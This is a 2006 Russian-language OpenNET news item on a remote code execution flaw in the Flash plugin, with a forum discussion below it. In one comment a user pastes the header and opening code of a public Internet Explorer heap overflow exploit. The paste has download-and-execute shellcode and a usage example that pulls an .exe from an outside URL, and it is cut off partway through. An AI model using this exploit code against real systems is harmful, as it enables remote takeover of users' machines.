The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В Linux версии Flash плагина обнаружена опасная уязвимость.

14.09.2006 00:00

Во всех версиях Adobe/Macromedia Flash плагина найдена возможность запуска кода на машине пользователя через специально скомпонованный злоумышленником SWF файл.

  1. Главная ссылка к новости (http://www.securiteam.com/wind...)
  2. Multiple Vulnerabilities in Adobe Flash Player 8.0.24.0 and Earlier
  3. linux-flashplugin7 -- arbitrary code execution vulnerabilities
  4. Critical Fixes in flash-plugin-7.0.68-1
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/8327-flash
Ключевые слова: flash, security
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (17) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (-), 01:49, 14/09/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ATTENTION!
    Max, opennet does not work under firefox -- looks like something was broken today or yesterday.
    TAKE A LOOK, Please.
     
  • 1.3, Аноним (-), 07:19, 14/09/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    для этого в адобе сделали таку венечку как : кликните для акливации флеш ролика
     
     
  • 2.8, PENGUIN of NSK (?), 13:39, 14/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    Вообще-то, в Мелкософте.
    JFYI.
     
     
  • 3.9, Ананимуз (?), 19:10, 14/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    Тогда уж "и в Майкрософте тоже"
     

  • 1.4, жж (?), 08:05, 14/09/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    у FC5 сегодня вышел апдейт для пакета flash-plugin
     
  • 1.6, edwin (??), 11:49, 14/09/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Господа а каково Ваше мнение о:
    http://savannah.gnu.org/projects/gnash
    По так сыроват будет
     
     
  • 2.13, vOrOn (?), 22:05, 14/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    > Господа а каково Ваше мнение о:
    > http://savannah.gnu.org/projects/gnash
    > По так сыроват будет

    Меня интересовал из этого проекта только плугин к Огнелису. После установки упомянутого, Огнелис успешно крэшился на всех сайтах, где хоть чуточку пахло флешем.
    На основании этого смело заявляю - в работе не видел, но осуждаю. :)

     
     
  • 3.23, _Arti (??), 19:35, 17/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    Версия из CVS работает неплохо. Именно на FreeBSD AMD64 и именно как к плагин к FireFox. В отличие от "родного" флеш плагина, не использует специфичные для конкретной ОС подсистемы (например ALSA). Проект конечно еще сыроват, но с Вашей то помошью он конечно же наберт нужную фкнкциональность очень быстро. На счет скорости.... у Вас наверное нет аппаратной поддержки OpenGL, попробуйте Cairo.
     
  • 2.22, squirL (ok), 02:14, 17/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    >Господа а каково Ваше мнение о:
    >http://savannah.gnu.org/projects/gnash
    >По так сыроват будет

    я когда искал, чем бы на AMD64 FreeBSD посмотреть flash в огнелисе, мне эту фичу в рассылках посоветовали добрые пендостанцы... ужос и кошмар. проц грузит просто немеряно, плюс, как уже сказали валит firefox на каждой второй флэшине. короче живу я без флэша и счастлив :)


     

  • 1.10, Advanced Аноним (?), 19:23, 14/09/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Не очень понятно почему "В Linux версии..." по ссылке вообще слово Linux не упоминается.
     
     
  • 2.12, pavlinux (ok), 21:04, 14/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    А ты у производителя поглядел http://www.adobe.com/support/security/bulletins/apsb06-11.html

    Multiple Vulnerabilities in Adobe Flash Player 8.0.24.0 and Earlier Versions
    Release Date: September 12, 2006
    Vulnerability Identifier: APSB06-11
    CVE Number: CVE-2006-3014, CVE-2006-3311, CVE-2006-3587, CVE-2006-3588, CVE-2006-4640

    Platform: All Platforms
    ..............^^^^^^^^^^^^^

     
     
  • 3.14, Advanced Аноним (?), 00:17, 15/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    Так я про то же. Смотри заголовок. "В **Linux** версии Flash плагина обнаружена опасная уязвимость."
     
     
  • 4.15, GateKeeper (??), 09:05, 15/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    А на этом сайте нас совершенно не интересуют Win* и Tiger* версии.
     
  • 2.17, Квагга (?), 21:45, 15/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    flash - это индустриальный стандарт.

    В том числе и баннеры на Opennet :)

     
  • 2.18, Akademic (??), 21:59, 15/09/2006 [^] [^^] [^^^] [ответить]  
  • +/
    Чем вам flash не угодил?
     

  • 1.19, XXXL (?), 22:20, 15/09/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Лично мне как пользователю *BSD, flash неугодил отсутствием нативной поддержки. И при этом он является типо индустриальным стандартом.
     
  • 1.24, pavlinux (??), 00:43, 18/09/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    *
    *-----------------------------------------------------------------------
    *
    * daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
    * !!! 0day !!!  Public Version !!!
    *
    * Copyright (C) 2006 XSec All Rights Reserved.
    *
    * Author   : nop
    *          : nop#xsec.org
    *          : http://www.xsec.org
    *          :
    * Tested   : Windows 2000 Server SP4 CN
    *          :     + Internet Explorer 6.0 SP1
    *          : Windows XP SP2 CN
    *          :     + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
    *          :
    * Complie  : cl daxctle2.c
    *          :
    * Usage       :d:\>daxctle2
    *          :
    *          :Usage: daxctle <URL> [htmlfile]
    *          :
    *          :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
    *          :
    *          
    *------------------------------------------------------------------------
    */

    #include <stdio.h>
    #include <stdlib.h>

    FILE *fp = NULL;
    char *file = "xsec.htm";
    char *url = NULL;

    // Download Exec Shellcode by nop
    unsigned char sc[] =    
    "\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
    "\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00"
    "\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95"
    "\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x0

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру